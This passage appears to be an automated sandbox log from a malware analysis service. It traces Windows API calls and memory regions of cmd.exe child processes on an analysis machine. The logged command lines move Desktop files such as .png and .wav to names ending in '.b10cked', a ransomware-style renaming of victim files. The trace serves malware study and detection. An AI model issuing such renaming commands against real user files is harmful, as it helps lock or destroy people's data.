lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.188] GetEnvironmentStringsW () returned 0x2b2ad8* [0220.188] FreeEnvironmentStringsW (penv=0x2b2ad8) returned 1 [0220.188] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.189] GetConsoleOutputCP () returned 0x1b5 [0220.197] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.197] GetUserDefaultLCID () returned 0x409 [0220.197] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.197] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="0") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="0") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="1") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.198] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.199] GetConsoleTitleW (in: lpConsoleTitle=0x2a08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.207] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.208] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.208] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.208] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.209] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.209] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.209] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.209] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.209] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.209] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.209] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.212] GetConsoleTitleW (in: lpConsoleTitle=0x12f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.360] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.360] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.360] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.360] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.360] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.360] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.360] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.360] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.360] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.360] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.360] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.360] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.360] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.360] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.360] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.360] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.360] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.360] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.360] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.360] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.360] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.360] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.360] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.360] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.360] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.360] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.360] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.360] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.361] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.361] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.362] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.362] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.363] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f39c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f394, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f394*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.365] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.365] _wcsicmp (_String1="59NIYO~1.PNG", _String2=".") returned 7 [0220.365] _wcsicmp (_String1="59NIYO~1.PNG", _String2="..") returned 7 [0220.365] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\59niyo~1.png")) returned 0x20 [0220.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.365] SetErrorMode (uMode=0x0) returned 0x0 [0220.365] SetErrorMode (uMode=0x1) returned 0x0 [0220.365] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", nBufferLength=0x104, lpBuffer=0x12ed24, lpFilePart=0x12ed0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", lpFilePart=0x12ed0c*="59NIYO~1.PNG") returned 0x25 [0220.365] SetErrorMode (uMode=0x0) returned 0x1 [0220.365] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.365] _wcsicmp (_String1="59NIYO~1.PNG", _String2=".") returned 7 [0220.365] _wcsicmp (_String1="59NIYO~1.PNG", _String2="..") returned 7 [0220.365] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\59niyo~1.png")) returned 0x20 [0220.366] SetErrorMode (uMode=0x0) returned 0x0 [0220.366] SetErrorMode (uMode=0x1) returned 0x0 [0220.366] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", nBufferLength=0x104, lpBuffer=0x12f1a0, lpFilePart=0x12ef38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", lpFilePart=0x12ef38*="59NIYO~1.PNG") returned 0x25 [0220.366] SetErrorMode (uMode=0x0) returned 0x1 [0220.366] SetErrorMode (uMode=0x0) returned 0x0 [0220.366] SetErrorMode (uMode=0x1) returned 0x0 [0220.366] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked", nBufferLength=0x104, lpBuffer=0x12f3a8, lpFilePart=0x12ef38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked", lpFilePart=0x12ef38*="59nIYoZ1Klx-.png.b10cked") returned 0x31 [0220.366] SetErrorMode (uMode=0x0) returned 0x1 [0220.366] SetLastError (dwErrCode=0x0) [0220.366] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png.b10cked")) returned 0xffffffff [0220.366] GetLastError () returned 0x2 [0220.366] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x12e8b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8b4) returned 0x2a0ef8 [0220.366] FindNextFileW (in: hFindFile=0x2a0ef8, lpFindFileData=0x12e8b4 | out: lpFindFileData=0x12e8b4) returned 0 [0220.367] GetLastError () returned 0x12 [0220.367] FindClose (in: hFindFile=0x2a0ef8 | out: hFindFile=0x2a0ef8) returned 1 [0220.368] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x2b1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1ae0) returned 0x2a0ef8 [0220.368] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked", nBufferLength=0x104, lpBuffer=0x12eb4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked", lpFilePart=0x0) returned 0x31 [0220.368] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png", nBufferLength=0x104, lpBuffer=0x12eb4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png", lpFilePart=0x0) returned 0x29 [0220.368] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png")) returned 0x20 [0220.368] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png.b10cked"), dwFlags=0x3) returned 1 [0220.369] FindClose (in: hFindFile=0x2a0ef8 | out: hFindFile=0x2a0ef8) returned 1 [0220.369] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eb00 | out: _Buffer=" 1") returned 9 [0220.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.369] GetFileType (hFile=0x7) returned 0x2 [0220.369] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.369] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ea8c | out: lpMode=0x12ea8c) returned 1 [0220.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.369] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12eac0 | out: lpConsoleScreenBufferInfo=0x12eac0) returned 1 [0220.370] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0220.370] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x12eb00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0220.370] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eae4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x12eae4*=0x1a) returned 1 [0220.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.371] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.371] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.371] SetConsoleInputExeNameW () returned 0x1 [0220.371] GetConsoleOutputCP () returned 0x1b5 [0220.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.371] exit (_Code=0) Process: id = "571" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16f20" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32874 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32875 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32876 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32877 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 32878 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32879 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32880 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32881 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32882 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 32883 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33200 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33201 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33202 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33203 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 33204 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 33205 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33206 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33207 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33208 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33209 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33210 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33211 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33212 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33213 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33214 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 33215 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33216 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33217 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33218 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33219 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33220 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33221 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 33222 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 33223 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 775 os_tid = 0xeb8 [0220.793] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f99c | out: lpSystemTimeAsFileTime=0x28f99c*(dwLowDateTime=0xb866a3a0, dwHighDateTime=0x1d440a9)) [0220.793] GetCurrentProcessId () returned 0xcb0 [0220.793] GetCurrentThreadId () returned 0xeb8 [0220.794] GetTickCount () returned 0x3d9bb [0220.794] QueryPerformanceCounter (in: lpPerformanceCount=0x28f994 | out: lpPerformanceCount=0x28f994*=27758275082) returned 1 [0220.794] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.794] __set_app_type (_Type=0x1) [0220.794] __p__fmode () returned 0x76b331f4 [0220.794] __p__commode () returned 0x76b331fc [0220.794] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.794] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.794] GetCurrentThreadId () returned 0xeb8 [0220.794] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb8) returned 0x38 [0220.795] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.795] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.795] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.795] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.795] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f92c | out: phkResult=0x28f92c*=0x0) returned 0x2 [0220.795] VirtualQuery (in: lpAddress=0x28f963, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.795] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.795] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.795] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.795] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.795] GetConsoleOutputCP () returned 0x1b5 [0220.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.795] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.795] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.795] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.796] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.796] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.796] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.796] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.796] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.796] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.796] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.796] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.796] GetEnvironmentStringsW () returned 0x370150* [0220.796] FreeEnvironmentStringsW (penv=0x370150) returned 1 [0220.797] GetEnvironmentStringsW () returned 0x370150* [0220.797] FreeEnvironmentStringsW (penv=0x370150) returned 1 [0220.797] 